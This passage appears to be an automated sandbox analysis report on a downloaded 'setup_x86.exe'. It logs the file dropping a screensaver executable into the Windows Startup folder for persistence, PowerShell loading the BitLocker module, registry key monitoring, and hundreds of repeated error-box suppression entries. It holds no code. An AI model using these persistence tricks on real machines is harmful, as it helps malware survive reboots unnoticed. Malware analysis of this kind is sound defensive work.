Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Downloads\setup_x86.exe			Jump to dropped file

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr

Jump to dropped file

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup_x86.exe.log

Jump to behavior

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr

Jump to dropped file

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr

Jump to behavior

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Downloads\setup_x86.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
